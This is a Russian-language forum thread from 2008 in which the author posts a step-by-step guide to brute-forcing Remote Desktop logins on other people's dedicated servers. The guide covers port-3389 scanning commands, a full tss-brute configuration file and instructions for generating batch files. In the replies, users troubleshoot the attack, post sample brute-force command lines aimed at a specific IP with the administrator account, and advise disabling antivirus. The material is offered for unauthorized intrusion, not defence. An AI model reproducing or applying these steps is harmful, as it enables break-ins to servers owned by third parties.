ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Underground > Информационная безопасность

Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;)

 
 
Опции темы Рейтинг: Рейтинг темы: голосов - 9, средняя оценка - 3.11.
Старый 07.08.2008, 00:54   #1
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию Брут дедиков [by Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??
1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.


Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг
Код:
[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1
и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:
1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270



ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ




VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.
Вложения
Тип файла: rar rankor.rar (186.1 Кб, 2985 просмотров)
Тип файла: rar www.rar (894 байт, 2469 просмотров)
Тип файла: rar VNC_Bypauth.rar (5.8 Кб, 2118 просмотров)
Тип файла: rar tss-brute.rar (86.8 Кб, 2676 просмотров)
Тип файла: rar RDP_client 5.1.rar (397.9 Кб, 2501 просмотров)

Последний раз редактировалось Capcha; 17.05.2009 в 00:57.
Capcha вне форума  
Плюсанули Capcha — 2 :
Старый 22.08.2008, 08:36   #226
Участник
 
Регистрация: 05.08.2008
Сообщений: 192

Репутация: 581
По умолчанию

easton, используй оригинальный брут от спайдера (без батника), в нем таких зависаний брута я лага нет, я уже раньше на эту тему отписывался.
__________________
«Мерило твоего Бога, - есть мерило твоего разума».
Эта сущность есть, собственно говоря, совесть, ибо она говорит человеку, чем он должен быть, указывает ему, что он не таков.
dimon878 вне форума  
Старый 22.08.2008, 08:49   #227
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

dimon878, Спайдер пропускает много дедиков...
Capcha вне форума  
Старый 22.08.2008, 10:13   #228
Участник
 
Регистрация: 05.08.2008
Сообщений: 192

Репутация: 581
По умолчанию

~2-4% у меня пропускает
__________________
«Мерило твоего Бога, - есть мерило твоего разума».
Эта сущность есть, собственно говоря, совесть, ибо она говорит человеку, чем он должен быть, указывает ему, что он не таков.
dimon878 вне форума  
Старый 22.08.2008, 11:32   #229
Участник
 
Регистрация: 21.08.2008
Сообщений: 12

Репутация: 1
По умолчанию

а когда в прогу от ранкора суешь суешь результаты VNC.exe их нужно очищять от порта ?
chegevara вне форума  
Старый 22.08.2008, 11:37   #230
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

chegevara, да, конечно..
Capcha вне форума  
Старый 22.08.2008, 11:46   #231
Участник
 
Регистрация: 21.08.2008
Сообщений: 12

Репутация: 1
По умолчанию

у меня выходит ошибка I/O error 105 что это?и ещё вопрос что нужно выбирать в програме ранкора в 4 окне ?
chegevara вне форума  
Старый 22.08.2008, 11:53   #232
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

chegevara, Говорит о том что у тебя что-то открыто, попробуй всё позакрывать...
Capcha вне форума  
Старый 22.08.2008, 11:53   #233
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

chegevara, забыл нажать на Save -сначала сэйв а потом create.
105: файл не открыт для записи
"4е окно" это Memo, туда выводится результат
RankoR вне форума  
Старый 22.08.2008, 12:37   #234
Участник
 
Регистрация: 21.08.2008
Сообщений: 12

Репутация: 1
По умолчанию

короче сгенерировал я батнег прогой от ранкора, когда начинаю брут открываеться окно и начинаеться перебор без пароля ,я даже не знаю как это объяснить.может кто сказать в чём проблема

Добавлено через 1 минуту
Цитата:
Сообщение от RankoR Посмотреть сообщение
О_О
подумай, надо ли оно тебе (я про брут)
я уже разобрался с твоей прогой,поверь мне это нужно..

Последний раз редактировалось chegevara; 22.08.2008 в 12:38. Причина: Добавлено сообщение
chegevara вне форума  
Старый 22.08.2008, 12:45   #235
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

chegevara, в секунду всё быстро мелькает? или окно RDP открывается?
Уточни , а то мы не телепаты..
Capcha вне форума  
Старый 22.08.2008, 12:46   #236
Участник
 
Регистрация: 21.08.2008
Сообщений: 12

Репутация: 1
По умолчанию

капча точно всё мелкает и окно Rdp не открываться.
chegevara вне форума  
Старый 22.08.2008, 12:51   #237
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

chegevara, ты папку не создал которую в проге указывал "Logs" или что-то подобное.
Capcha вне форума  
Старый 22.08.2008, 13:00   #238
Участник
 
Регистрация: 21.08.2008
Сообщений: 12

Репутация: 1
По умолчанию

Цитата:
Сообщение от Capcha Посмотреть сообщение
chegevara, ты папку не создал которую в проге указывал "Logs" или что-то подобное.
папку я создал, после того как всё промелькало, я зашёл в эту папку там было около 3000 txt'шников и ни в одном ничего не было написано,так что я не знаю в чём проблема,может кто нибудь сталкивался с этим?
chegevara вне форума  
Старый 22.08.2008, 14:29   #239
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

Цитата:
Сообщение от lamer007 Посмотреть сообщение
ОТ СЮДА - не качает - перезалей пожалуйста.....
качает. На всякий случай ссылки
Всё остальное - в архиве. (все ини файлы исправлены уже (осталось подправить только коннектшны - рассписывалось на каждой странице.)
Скачать | Download (758 Кб):
:download:dump.ru
:download:webfile.ru
:download:rapidshare.com

Краткий порядок действий с архивом:
1. Из каталога RDP_client 5.1 копируйте файлы в c:\winnt\system32. Подтвердите замену. Сделайте атрибутами файлов ReadOnly
2. Поставьте английский язык языком ввода по умолчанию
Пуск->Выполнить-> intl.cpl.
Вторая вкладка - Языки. Там нажимаешь на кнопку "Подробнее" и смотришь, что выбрано в первом выпадающем списке. Должно быть Английский /Американский. НЕ РУССКИЙ.
3. Залейте файлы из каталога www к себе на хост. Вы можете воспользоваться моим хостом. Он постоянно будет доступен для вас по адресу: _http://nemezzgr.phpnet.us/
4. Заполните файл pass.txt своими паролями
5. Просканируйте серверов командой vnc -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT
6. php-скриптом создайте батник
7. Сохраните батник в каталоге с брутом.
8. Запустите
9. После окончания запустите программу Rankor-а для поиска гудов в логах.

P.S. Действия 1-4 выполняются 1 раз, остальные - при каждом бруте

Как вариант - твой антивирь блокирует. Стопай проактиную защиту (или AMON), полностью выгружай антивирь и качай. Удачи!
NemeZz вне форума  
Старый 22.08.2008, 14:46   #240
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Цитата:
Сообщение от NemeZz Посмотреть сообщение
Из каталога RDP_client 5.1
Нужен 5.0 клиент а не 5.1
Цитата:
Сообщение от NemeZz Посмотреть сообщение
http://nemezzgr.phpnet.us/
Я уже указывал свою ссылку в статье
Capcha вне форума  
Старый 22.08.2008, 15:48   #241
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

людь у мя руки их жопы растут все мелькает када батник открываю и усе
__________________
купить номер icq
...vamp вне форума  
Старый 22.08.2008, 15:51   #242
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

Цитата:
Сообщение от ...vamp Посмотреть сообщение
людь у мя руки их жопы растут все мелькает када батник открываю и усе
1. РДП 5.0
2. Проверь путь до брута, пассов. Короче проверь что в батнике написано
3. Папка логов
4. Язык по умолчанию английский.
5. Руки и голова тоже не помешают :)))
Andrew777 вне форума  
Старый 22.08.2008, 16:36   #243
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

...vamp, Скинь сюда любую строчку из батника
Capcha вне форума  
Старый 22.08.2008, 16:41   #244
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

каг бэ пробова по разному так
C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\Паша\pass.txt -u administrator 195.73.0.115 >>C:\Documents and Settings\xxx\logs/195.73.0.115 .txt
и так
tss-brute.exe -w pass.txt -u administrator 195.73.0.115 >>logs/195.73.0.115.txt
__________________
купить номер icq
...vamp вне форума  
Старый 22.08.2008, 16:55   #245
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

Закинь папку с брутом в другую директорию, чтобы путь был без кириллицы или сохраняй батник с кодировкой 866.
Andrew777 вне форума  
Старый 22.08.2008, 16:59   #246
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

и чтоб пробелов не было, т.е. C:\Documents and Settings\ не подходит
RankoR вне форума  
Старый 22.08.2008, 17:09   #247
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

pass.txt должен находиться в одной папке с брутом.
Andrew777 вне форума  
Старый 22.08.2008, 17:12   #248
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

ьак кагбэ так и есть
__________________
купить номер icq
...vamp вне форума  
Старый 22.08.2008, 17:14   #249
Участник
 
Регистрация: 21.08.2008
Сообщений: 12

Репутация: 1
По умолчанию

всё мелкает и окно Rdp не открываться,с чем это может быть связанно?
chegevara вне форума  
Старый 22.08.2008, 17:26   #250
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

где 5 версия рдп?вродь в теме была покапался не нашел
__________________
купить номер icq
...vamp вне форума  
 

Метки
brute, dedicated server

Опции темы
Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 05:38.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи Коротко обо всем